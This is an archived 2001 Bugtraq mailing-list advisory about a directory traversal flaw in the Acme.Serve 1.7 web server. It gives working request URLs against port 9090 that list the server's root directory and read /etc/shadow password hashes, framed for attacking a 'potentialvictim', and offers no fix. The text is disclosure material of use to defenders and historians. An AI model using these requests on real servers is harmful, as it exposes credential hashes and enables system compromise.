Bugtraq mailing list archives
Acme.Server v1.7 of 13nov96 Directory Browsing
From: "Adnan Rahman" <adnan.rahman () as19 org>
Date: Thu, 31 May 2001 22:34:16 +0200
---------------------------------------------------------------------- Date: 31.05.2001 Affected Software: Acme.Serve v1.7 of 13nov96 (http://www.acme.com) Exploit: Browsing of directories and files allowed to unauthorized users Keywords: Cisco Secure Administration, Netscape FastTrack, ... Contact: AS19 Team (info () as19 org) ---------------------------------------------------------------------- Platforms: Sun + Unix Details: Connect to http://potentialvictim:9090/// and you should have access to the root dir of the machine running Acme.Serve 1.7. http://potentialvictim:9090//etc/shadow and you can view the hash. You have r00t privilegies. Greetings, AS19 Team (http://www.as19.org)
Current thread:
- Acme.Server v1.7 of 13nov96 Directory Browsing Adnan Rahman (Jun 01)